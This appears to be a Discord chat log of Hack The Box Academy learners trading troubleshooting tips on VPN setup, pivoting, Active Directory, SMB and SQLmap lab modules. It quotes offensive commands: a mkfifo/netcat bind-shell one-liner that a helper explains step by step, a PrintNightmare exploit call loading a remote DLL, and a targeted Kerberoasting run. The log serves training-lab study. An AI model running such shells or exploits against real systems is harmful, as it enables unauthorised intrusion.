anyone have any advice when trying to RPD get error of "[ERROR][com.freerdp.client.x11] - failed to open display:
[ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set." I read some HTB forms and found this https://unix.stackexchange.com/questions/598924/display-environment-variable-not-set but that also didn't fix it

don't run around your system as root

Im currently logged into the box with just the user creds given

you can't rdp on an ssh session

it doesn't pass through the display

it helps if you supply the module and section name

oop my apologies its the Active Directory Enumeration & Attacks, Skill assessment 2 question 3

you need to pivot to use RDP

use whatever pivoting method you wish [my personal favorite is ligolo-ng]

https://github.com/nicocha30/ligolo-ng

https://github.com/nicocha30/ligolo-ng/wiki

well it did work whenever i used evil-winRM was just wondering why that RDP error came up

well evil-winrm isn't rdp

it's a different protocol entirely

it's winrm - windows remote management, CLI

https://learn.microsoft.com/en-us/troubleshoot/windows-client/system-management-components/configure-winrm-for-https

ah okay im probs just messing up proper tool usage then

thank you!

but again; one of the modules/methods you should know in order to be successful in AD enum&attacks is pivoting

Hey,

i am trying to responde the last question for crackmapexec module about vulnerability scanner. However, my proxy does not work as it seems the software is not compatible to windows version 'This version of C:\Windows\Temp\chisel.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher'. Does anyone knows the right version or a way around this?

did you download the 32 bit or 64 bit :)

knowing which one you're using helps

i believe was 32 =/. i was jsut following the module. i will download again . thanks for your prompt response

64 bits

I am in that same section of CME module now... using 64 bit

this was it i was being silly, had to xfreerdp into the first box instead from my ssh, then was able to xfreerdp into next box

thank you 🙂

worked for you? what URL did you download it from?

https://github.com/jpillora/chisel/releases

I think it's a go program, so when you build, it will build for all platforms all at once.

thanks SysRisk i will give a try

yeah, i cannt make work at all

There is only linux and darwin in that releases folder... hmmm. I think I built it.

Ahhh... click on show all 85 assets

gotcha! thanks

Hi, someone did the Introduction to Malware Analysis - Debugging section recently, it seems like its not working properly

like this guy apparently

that was 2 months ago btw

A guy already send a ticket to support in May and there was a bug

Yeah

in order for people to help you it helps others to know what you've done/tried/errors

just saying "It's not working :(" isn't helpful

Maybe a skill issue, i did all the x64dbg steps in order to bypass the Sandbox detection but it keeps detecting it at run.

I tried like 10 times

I saved the "modified" executable, still the same

ok i must ask. is it reallly worth the money for this site? i only ask becuase i was in the middle of a lesson and lost connection to VM and i can no longer complete the course do to the 1 a day ordeal.

<@&861185840277487616>

Someone’s selfbot going haywire

<@&861185840277487616>

It is best to run your own vm. The course content (especially when you can sub as a student for 8$ a month) is really good

If you are running on a non sub then your time with the pwnbox is limited, but you’ll learn much more running your own vm anyway

so i run parrot on dual boot. how do i do the class without loading into the pwnbox that has been my issue

you can just connect via the vpn pack

You have to “connect via vpn”, download the academy vpn file and run “sudo openvpn <yourfile>”

^

"spawn target" and "spawn instance" are different buttons

can i not run ssh

in order to ssh into the target you need to be connected to the vpn

or if you want to ssh to the pwnbox, you need to well... launch the pwnbox

ok i understand what is being said. where do i find this vpn download

but the htb targets are mostly on a separated internal network

if the module has a target spawn, above where it shows "spawn instance"

there will be a dropdown list you can select the vpn server from and protocol, then just click download

Hi Chat, why cant i send a message in general chat?

sudo openvpn /downloads/academy-regular.ovpn
i am guessing this was wrong.

read and follow #welcome

/downloads/ doesn't exist

there is no downloads folder in the root of your filesystem

there is one in your Home (~)

Downloads (capitalization matters)

here's a big tip for linux, if it's not popping up when you hit tab it likely isn't there

Thank you Boss

i am currently that module for dir

for instance if you open a terminal and do sudo openvpn Downloads/academy-regular.ovpn or sudo openvpn ~/Downloads/academy-regular.ovpn it should run

and once you see Initialization sequence complete (and maybe a few lines after) you're good to go open a new terminal and work off that

ok so if i understand correctly once initialization is complete the new terminal will correlate to the study modal

no

the vpn is good for the whole of academy modules, you don't need to download a new one every time

it jut facilitates a connection to the HTB private internal servers where the targets are launched

allowing you to connect to the targets on the 10.129.x.x network

ok so then i ssh to target?

if that's what the module asks you to do, yes

perfect i was able to gain access to target. so let me ask you this. with every download vpn will it give me a target ip if so where do i find it

it won't give you the target ip

by the questions there's "Target: 'Click here to spawn target system'"

that's what spawns and gives you the target, as stated, you don't need to redownload the vpn every time

ok so every lesson just run sudo openvp and then open new terminal and just go about the course

thank you for the help

nope you just need to run it once per session that you're working on academy

ok

you can go to another section, spawn a target, and you'll be able to connect to it

note: when you start a target it will end other targets running for your account, so you can't spawn 5 targets for a module

ok i think i have an understanding. thank you very much for assisting me.

the vpn you download isn't tied to the section you're working on, it's tied to your academy account as a whole, basically

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

that makes it clear. as long as vpn is running terminal is conncected HTB

your system is; yes

Hey did you figure out what's needed?

don't remember exactly what I did, but i just did whatever they said to do in the module notes, previously i was trying my own custom loaders

I literally did exactly that

Did you have an actual listener on at the time?

all right. i got the answer on my own by writing a super janky pwntools script and using the lists in the seclists directory; i didn't even know what they were referring to when they mentioned the "provided" wordlist.

can someone just tell/DM me what were supposed to be the intended ways to solve the second enumeration question, with the actual working commands? i'm guessing it was intended to be done with either of the network mapper script or the standalone CLI tool. but i can't for the life of me figure out what the syntax is to get the user to pop out of the results for either method.

i would love to know both ways and would appreciate if anyone would be kind enough to just let me know.. i spent days on this determined to get the flag on my own without looking up the support messages here and was able to prevail 🙏

there's a "resources" link on the page that contains wordlists applicable to the various modules. just put the module and section names in your text, no one's going to bother typing the url in from your pic.

right. i already see what they meant now.
anyway, module Footprinting, page SMTP

if it's a better prompt to work with for feedback, i can provide some command history. (just want to reiterate, have already got the flag; just can't figure out what my syntaxing problems are here):

Smtp is slow, you may want to __w__ait a bit

Also that module has a provided wordlist or two in the resources button

thank you for the hint 👌

Did you make sure to pick the right project type? .net vs .net framework?

Actually I'm not sure. Thanks I'll check that out

I did aes only do I have to have both xor and aes?

quick question if my subscription ended can i still run the machines in the modules i finished or only i can read them

i mean cpts path modules

if you completed the module you can start the targets still

even if my subscription expired ?

yes, if you completed the module before the subscription expired

this is cool W HTB

Wait until you find out you'll still have access to unlimited pwnbox

this is insane hahaha BIG W

I need help with this quetion Windows PE + 0 Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag. i cannot update the slack cookie

anyone got a nudge for the final question of Windows Lateral Movement? I got the vnc password, stuck on getting dc connection

please i need help

Hello!

Error after executing a kernel exploit CVE-2021-3493

When I try to implement the steps explained in the solution (https://academy.hackthebox.com/module/51/section/467) I have an error.
When I try to execute a compiled binary on the target machine, I receive an error which says that the glibc.so.6 is not the right version. Does someone have the same issue and how he/she fixed it?

Another issue is that if I have "root access" (output of the id command shows that I am root), I cannot read any root-related content. (have you seen this behavior?)
Thanks!

Currently I'm in double pivot in exploitation of cpts path, i did double pivot but in nmap results it is showing port state as a filtered anyone please help me

If you’re using Proxy chains you might wanna do -sT

I'm used the method which shown in the module

Even i tried ligolo but i'm unble to ping the final machine

Yeah, but it wouldn't take the right answer until I reloaded the page.

For the last question in Windows Lateral movement.. did anybody experience unbelievable slowness connecting to VNC? I am using proxychains, because when I used ligolo for pivot it didn't even seem to connect. Not sure how to get a better/faster connection

The window doesn't even seem to respond to mouse clicks

Hello

Who is now studying in Windows PE , if you there let’s review together?

can any one help me with active directory attack and enum module bleeding edge vulnerabilities PrintNightmare portion i am getting this error when running the command "sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'"

Help me please :Modern Web Exploitation Techniques

skills assesment : What is the flag value at the /flag endpoint of the PDF web application?

I tried dnsrebinding technique but not worked

Hello everyone I am new can anyone please tell me a good source to study bug bounty from 0 ?

Follow the fundamentals path and CBBH path on Academy

Please help

I tried this and https://lock.cmpxchg8b.com/rebinder.html but not worked

Try 'smtp://<IP>'
Maybe it will work

Have you tried just "fiona"?

i got 500 points what module do u recommend i heared good stuff about the bloodhound and the crackmapexec module i'm planning to get the cpts will they help me ?

…

Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

yeah found that one

but when connecting to FTP with that credentials now work for me

like when we do "ls" it just say "Passive mode" and no response.

Have you tried turning passive mode off?

how to do it

Type passive, if I remember right

this one kindly

You can DM

Hello guys i'm new here i'm doing the password attacks module and im at the section network services i'm doing the smb one but i get an empty flag.txt does anyone have the same issue?

screenshot?

What module/section is that?

Attacking Common Services - Easy

I cant upload dunno why

No its passsword attacks

write command here

Network services

which section?

i got you, where you are stucked?

smbclient -U cassie \\<ip>\CASSIE

Password:12345678910

ls

And get flag.txt

yeah, i had got same issue when i was doing this.

Please read #welcome and #rules it will explain how to get verified and allow to upload images

OK thanks

Hey who can help me with how to connect to vpn on laptop using hackthebox im new to this

Did you Google the error?

They said use ssl= Disabled but when i use it terminal said invalid option

--skip-ssl

Anybody who can give me a hint for ADCS skill assessment, i tried to get a shell on DEV01 with printnightmare as I found $RPC, i tried to request a cert for DEV01, but it needs higher privilige than tom to actually issue the cert, i tried to capture hases, but there seems no activity... what technique/skill should i restudy ?

I reset the target and it works noice

Y'all know how to get my acc back?

Contact support

Nahh bro said i can't get my acc back

Hi i am currently in the learning process model , I tried finding some ressources about the ROQ relationship oriented question model to understand it better but I failed finding such, as any search result either video or google does not give ROQ like if it only exists in htb, I hardly understand how to apply ROQ in everyday life without further examples than the one used on htb which talks about the methods we can use to access windows remotely, please help

can some one please help me over this

can someone please give me a nudge on the last question of windows lateral movement SA? I got the VNC password but cannot connect to domain controller

You don’t use vnc to connect to the dc

The command you passed is missing a slash '\ IP' '\ \IP'

/ or //

smbclient works with // otherwise you need to \\\\

I just finished it, check if you pivot correctly.

Can anyone tell me when we have to use backslash & forward slash while using smbclient and how much time we have to use?

I always confused about this

\ is an escape character in bash; and most languages \\ <-- this is 4 " \ " but will be interpreted as 2;

// has been accepted by smbclient for a while now and can replace the \\\\

but the UNC path needs to have 2 [interpreted] slashes to be a valid path

\\\\[IP/SERVER]\\Sharename is the same as //[IP/SERVER]/Sharename

if the share has any spaces in it you'll need to wrap it in quotes

ive connected to the backup computer through rdp, found open ports on dc, etc. Ive been on this for too long lol

hi, can i ask questions about non retired machines anywhere here? Or is that not allowed? Upon logging in, the forum for machines is is invite only:) Just joined the server, and i didnt find where to ask

read and follow #welcome to access more of the server; they're not "invite only" you just need to follow basic instructions

Yeah, just saw it now. Thanks

also you can't really discuss active machines without spoiling

you can ask for nudges

true, but i have tried to get foothold for like 2 days, and i dont know if i am in a rabbithole or not. So i just need a yes or no answer lol

where would i ask for nudges?

if it's one of the two recent releases they have their own channel [ #1317551396920229958 #1320087957612265574 ] or #boxes

Okay I did a double pivot. If you want you can DM.

it is about the caption machine

sent u one

then #boxes...

getting started module, types of shells. do i need to understand the shell commands for ex:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

because it's not explained so that's y im asking

throw it into explainshell

• if /tmp/f exists delete it
• create a fifo named pipe /tmp/f
• read the pipe; and send it to bash (include error and stdout redirect, 2>&1) pipe that to netcat
• use netcat to listen [-l] on port x [-p x]
• then redirect the netcat output to the named pipe (/tmp/f)

got it

thank you

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

/bin/bash -i runs bash in "interactive"

https://explainshell.com/explain?cmd=bash+-i

@lime cosmos moving the convo here; what section are you working on in Getting Started

Hi is there an implementation for reseting a module progression ?

no

Ok thanks !

google, man pages, and --help are gonna be your best friend, |,; are command separators so you can individually figure out each command

https://academy.hackthebox.com/module/77/section/726#questionsDiv

List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

giving the module and section name is more helpful

you're given bob's login on the page

i send the link

bob:password

ctrl-f for bob:

you don't need to bruteforce it at all

what about the cpts exam ?

i mean when i will facing the same problem ?

if it's meant to be bruteforced or sprayed it won't take a long time

ok and i will use the rockyou list ?

that's the general rule of thumb ~hour at most

you'll use whatever list seems appropriate

the modules teach you how to craft your own list and things of that nature

ok thanks

don't overthink the getting started module

it's not gonna have you do anything overly complex

Appreciate it gonna keep this in mind

at least you're willing to try and understand instead of "oh ok this is a bind shell command, whatever"

that is what im trying to avoid as much as possible i want to understand the roots of everything to build strong foundation

it also helps to understand when digging is gonna lead you down a rabbithole. but reasonably understanding what a tool does allows you to understand similar tools.

I approach any section by reading it first, then thinking about it deeply and searching to understand anything that doesn't make sense. And at the end, I write notes down

Write as you go, highlight words you don't understand [in an app like obsidian that's easy with ==text== or (word/phrase)?] That way when you encounter it again or it's explained later you can hopefully clear confusion

Ok this is useful I didn’t know about it

I’ll use for sure

This is note taking 101 :)

Rewriting in your own words is almost always more beneficial

The only person that needs to understand your notes is yourself

Yea i write 90% of the notes by myself

Exactly i always try to explain as im explaining to sm1 with 0 knowledge about cybersecurity

need a nugget from cme skillassesment last question (DC01)

With what do you stuck at?

last question in gerneal got to the ccache and got the flag but after that im stuck

using || nick ||

Try to investigate that 'Ccache' share further. perhaps the share's name can serve as some hint.

it does 🙂

ty i guess my nxc is broken again didnt got anything
time for smbclient

The question is doable with crackmapexec/netexec alone.

i bet if it works properly

Did you end up finding a solution for this? I’m currently bruteforcing the offset but I feel like that can’t be it lol

I’m stuck on abusing HTTP misconfigurations skill assessment - hard. I’m not sure where to start. Any chance someone could help me figure it out? I’d really appreciate any help.

i'm running a openvpn,but i get a "permission denied",can some one help me to fix this for me please?

sudo openvpn ...

when i trying to SSH to the machine by using htb-student@ip

and i got a permission denied erveytime even if i enter HTB_@cademy_stdnt!

screenshot

can't send one since they're not verified

aw damm, @carmine hill dm me ; )

Copy/paste the pw [ctrl-shift-v in terminal]

And I'm assuming you're replacing ip with the target 10.129 address

On the CME module skills assessment, the DNS server is not accepting queries...

That DC needs rebooting...

Even the solutions to the questions don't work!

‏ Hello , in broken authentication, brute-forcing passwords
‏The second question, I tried everything, even I tried the entire RockYou.txt without using grep (14344391 passwords)
‏And nothing worked with me, in the module they used rockyou.txt and they got the password but I think the password doesn’t exist in the rockyou.txt, Any tips?

I am surprised you got that far with the second question... mode 1300 and rockyou will definitely get the user pw.

Oh... different module! Sorry... broken auth!

who are you

<@&861185840277487616>

Yes, go troll elsewhere...

Get better opsec Omar, don't link your personal Spotify to your discord account

I'm doing the Using Web Proxies Skill Assessment and I'm running Intruder to find the correct cookie. They all come back with 200 OK Code and Half of them allow you to login. What am I suppose to put as the Answer?

200 ok doesn’t necessarily mean it did anything successful, can you actually log in with half of them?

The ones with shorter length bring me to a log in screen with a Flag but the flag isnt the correct code.

Does the flag end on ninja?

Yes

i********Ninja with a bunch of characters

That’s the right flag, it starts with HTB and ends on }. Make sure you don’t accidentally copied any spaces

hey

DACL Attacks I > Targeted Kerberoasting

when i try run this command

python3 targetedKerberoast.py -vv -d inlanefreight.local -u pedro -p SecuringAD01 --request-user Moly --dc-ip 10.129.205.81

[] Starting kerberoast attacks
[] Attacking user (Moly)
[DEBUG] {'Moly': {'dn': 'CN=Moly,CN=Users,DC=INLANEFREIGHT,DC=LOCAL', 'spns': []}}
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Traceback (most recent call last):
File "/home/kali/Desktop/cpts/dacl1/targetedKerberoast/targetedKerberoast.py", line 597, in main
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 323, in getKerberosTGT
tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 93, in sendReceive
raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

i did what they said on the note

sudo ntpdate 10.129.205.81

but still does not working

I let my frustration get the best of me. Lol. Thanks. I appreciate it!

yup

Hi guys, Im on the Sqlmap module and struggling to understand some of the "attack tuning" part of the module...could someone help me understand it a bit better? Im struggling to understand the prefixes and suffixes part

Do you understand the basics of a query? Like a legit query on the backend? Cause it helps to know that before fine tuning with the suffix and prefix.

what exactly aren't u understanding

yea Im pretty sure I do but I think htb didnt explain this part the best they could

let me show u

basically, the idea of suffix/prefix is that you use them to for the injection itself, it is the thing that triggers the injection

spoilers

is that a spoiler? sorry

So basically the with the prefix you're attempting to end the first part of the query in a certain way. So maybe a small string and a certain special character (after you've done some fuzzing) that will terminate the original query. The suffix is what will be at the end of the query, so essentially comment syntax to make sure the rest of the original query, after your injection, is not included

could u pls expand 😅 I thought wit sqlmap it already came with built in payloads that trigger the injection

for example, -- - is used to comment things out, you use it to bypass login for example, what comes after that, is the sqlmap shenanigans that exfiltrate database or read files or whatsoever

Exactly.. let's you define what to "wrap" your injection payloads that sqlmap generates in

ahh I see, that seems to make it a bit clearer

Sometimes sqlmap needs a little hand 😉

ohh I see, I thought Sqlmap would have those in their payloads by default? seems kinda extra to specify this in sqlmap, did the author not think of this in their payloads?

it is useful in whitebox when u can know what triggers the injection, and u just need to see how far can u go with it

Queries are unique - their structure sometimes require very specific enclosures

Every query language(MSSQL vs MySQL) is different and if it's not working sometimes adding your own syntax helps

ahh ok

cool, thank u, it seems to make it clearer

sqlmap does its best, but yeah, sometimes it can't infer or guess everything correctly

yeah most of the time, but some time you have devs doing some of the most weird queries that needs some fine tuning, hence the name of the section

ahh I see

I need to get flag 5 and thinking of what to use 🤔

The answer

(jk sorry)

damn i didnt even see 😂

cpts ?

nah cbbh

good luck!

thank you 😄

what is the "--no cast" flag in sqlmap?

It affects the usage of a mechanism in payload generation

https://github.com/sqlmapproject/sqlmap/wiki/usage#turn-off-payload-casting-mechanism

Check manuals 🙂

thanks 😄

Guys Im in login brute forcing skill assessment 2 , I found the other port with the webpage but theres no ftp port open or filtered and also ssh blocks me because i dont have the public key.
I tried to see if the public key is in the previous room but I'm having problems connecting to it as it responds to pings but I can't even see the login page

Cant enumerate anything with Medusa or hydra

Your error is due to clock syncing

Kerberos doesn't like unsynchronized clocks

You can sync your time to the DC with "sudo ntpdate [ip address]"

Don't just flat out ask for how to get a flag.. asking for guidance, fine, discussing problems you're having, fine.. avoiding posting information directly pertaining to the content.

Just asking how to get the flag, come on

sorry 😅

let me try word that better

Right..

Read back through the section

You have tried a command, it didn't succeed. Read the the section for options that can be used to help you

I can't help further, sorry - I'm gonna go chill for a while before bed, but yeah.. just dumping commands and output for questions which didn't work, asking for the answer.. it's the same thing

alr cool, thank you anyways

Hi, when trying to use sqlmap to enumerate tables from a database, why doesn't it sometimes work even if there are tables in the database?

which part are you doing in the sqlmal module?

im doing attack tuning in sqlmaps

which question

see the error , is there any '>' error in the scan process?

i just managed to do it, it was for flag 5

checked the hint

Come on

sorry

Third time

😅 😂

im sorry i need to get better at that

@ocean night may I please DM u?

Ok

thanks

I'm in login brute force assessment part 2 question 1
I'm reading on the forum that people are able to directly interact with ssh but Its telling me that I'm missing the public key. I nmapped the ip and found other 3 ports open and 2 filtered. It seems to me like all ports don't respond besides the one without service. Any clue?

Hi guys, i'm in the footprinting lab (hard) I have an error when I try to log in with mysql -u tom -p

Error 2002 (HY000): Can't connect to local server through socket '/run/mysqld/mysqld.sock' (2)

Re-read the section, you're missing something.

You're given a target.

You can interact with your pwnbox directly over ssh, not the target for this module.

You do not need to nmap the target

When I use Medusa it says no supported authentication method, when I try to login with ssh user@ip, it tells me immediately that I don't have the public key and I can't interact with ssh ahain

I don't understand what you mean by "not the target for this module"

module 57, section 516?

Pentester path, module login brute forcing, skills assessment part 2, question 1

one thing to keep in mind, that module was recently updated so the forums you're reading may be wrong

Sure.. read the question carefully

Ok

I still don't get it, I can't brute force anything because I can't interact with anything

What is the name of the ftp user you find via brute forcing?

Can't brute force anything

read the entire page not just the question

My bad about ssh, it is used here. Was looking at another module.

I'm too tired, and done. Night, cya later

But yeah.. the page does tell you what you need to know

Don't post dumps of info like that on modules over Tier 0 fml

Yes I did find the user. The problem is that I can't interact with ssh. I know the user but I get public key error

Ok no I go, for real. Can't deal

Which message is too much?

The one that was deleted

Mmm aight

Not you